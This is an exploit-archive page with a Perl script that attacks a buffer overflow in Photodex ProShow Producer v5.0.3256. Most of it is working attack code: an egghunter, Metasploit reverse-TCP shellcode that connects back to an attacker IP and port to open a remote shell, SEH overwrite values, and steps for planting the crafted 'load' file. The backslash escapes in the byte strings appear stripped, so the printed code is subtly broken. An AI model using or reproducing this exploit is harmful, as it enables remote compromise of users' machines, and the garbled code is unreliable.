Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Exploit
# Published : 2012-07-23
# Author :
# Previous Title : Apple QuickTime TeXML Stack Buffer Overflow
# Next Title : CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

#######################################################################################
# Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
# Date: 22/07/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://files.photodex.com/release/pspro_50_3256.exe
# Version: v5.0.3256
# Tested on: Windows XP SP3
# +-----------------------------------------------------+
# | This vulnerability was discovered and researched 	|
# | by Julien Ahrens [from Inshell]			|
# | http://www.exploit-db.com/exploits/19563/		|
# +-----------------------------------------------------+
######################################################################################

# The egghunter.
$egghunter  =
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # <-- The 4 byte tag
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

# MSF windows/shell_reverse_tcp 
# LHOST=192.168.178.27 LPORT=4444
$shellcode =
"xb8x78x6fx18xecxdbxcfxd9x74x24xf4x5ax31xc9xb1".
"x4fx31x42x14x83xeaxfcx03x42x10x9ax9axe4x04xd3".
"x65x15xd5x83xecxf0xe4x91x8bx71x54x25xdfxd4x55".
"xcex8dxccxeexa2x19xe2x47x08x7cxcdx58xbdx40x81".
"x9bxdcx3cxd8xcfx3ex7cx13x02x3fxb9x4exedx6dx12".
"x04x5cx81x17x58x5dxa0xf7xd6xddxdax72x28xa9x50".
"x7cx79x02xefx36x61x28xb7xe6x90xfdxa4xdbxdbx8a".
"x1exafxddx5ax6fx50xecxa2x23x6fxc0x2ex3axb7xe7".
"xd0x49xc3x1bx6cx49x10x61xaaxdcx85xc1x39x46x6e".
"xf3xeex10xe5xffx5bx57xa1xe3x5axb4xd9x18xd6x3b".
"x0exa9xacx1fx8axf1x77x3ex8bx5fxd9x3fxcbx38x86".
"xe5x87xabxd3x9fxc5xa3x10xadxf5x33x3fxa6x86x01".
"xe0x1cx01x2ax69xbaxd6x4dx40x7ax48xb0x6bx7ax40".
"x77x3fx2axfax5ex40xa1xfax5fx95x65xabxcfx46xc5".
"x1bxb0x36xadx71x3fx68xcdx79x95x1fxcaxeexd6x88".
"x66xf5xbexcax86x1bx63x42x60x71x8bx02x3bxeex32".
"x0fxb7x8fxbbx85x5fx33x29x42x9fx3ax52xddxc8x6b".
"xa4x14x9cx81x9fx8ex82x5bx79xe8x06x80xbaxf7x87".
"x45x86xd3x97x93x07x58xc3x4bx5ex36xbdx2dx08xf8".
"x17xe4xe7x52xffx71xc4x64x79x7ex01x13x65xcfxfc".
"x62x9axe0x68x63xe3x1cx09x8cx3exa5x39xc7x62x8c".
"xd1x8exf7x8cxbfx30x22xd2xb9xb2xc6xabx3dxaaxa3".
"xaex7ax6cx58xc3x13x19x5ex70x13x08";


$file		= "load"; # The "load" file 
$junk 		= "x41" x (9844 - length("w00tw00t") - length($shellcode));
$nseh   	= "xEBx06x90x90"; # short jump 6 bytes
$seh  		= "x73xb0x22x10"; # 0x1022b073 -p/p/r- [if.dnt]
$nops  		= "x90" x (100 - length($egghunter));
$exploit 	= $junk."w00tw00t".$shellcode.$nseh.$seh."x90x90x90x90".$egghunter.$nops;
open($File,">$file");
print $File $exploit;
close($File);
print " n[!] The 'load' file, was created successfully (".(length $exploit)." bytes) [!]nn";
print "[+] Place the arbitrary 'load' file, into the application directory.n";
print "[+] Execute the application (proshow.exe) n";